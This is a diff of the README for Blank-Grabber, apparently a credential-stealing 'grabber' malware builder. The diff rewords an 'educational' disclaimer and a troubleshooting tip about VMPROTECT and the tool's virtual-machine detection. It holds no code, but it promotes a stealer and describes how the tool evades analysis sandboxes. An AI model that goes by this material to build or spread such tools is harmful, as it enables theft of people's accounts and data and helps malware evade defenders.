Blank-c/Blank-Grabber/README.md

 ## Download
 [![Download](https://img.shields.io/badge/Download-Now-Green?style=for-the-badge&logo=appveyor)](https://github.com/Blank-c/Blank-Grabber/archive/refs/heads/main.zip)

-**Note:** This tool is for "educational" purpose only, and I am not responsible for any damage caused by it in any way!
+**Disclaimer:** This tool is for "educational" purpose only, and I am not responsible for any damage caused by it in any way!

-**Another Note:** If the grabber didn't work when you run it, then rebuild it with VMPROTECT option turned off.
+**Note:** If you didn't get any result while testing the grabber on yourself, you may try to turn off VMPROTECT as the grabber might have detected your system as a virtual machine.

 ## Features
     • GUI Builder.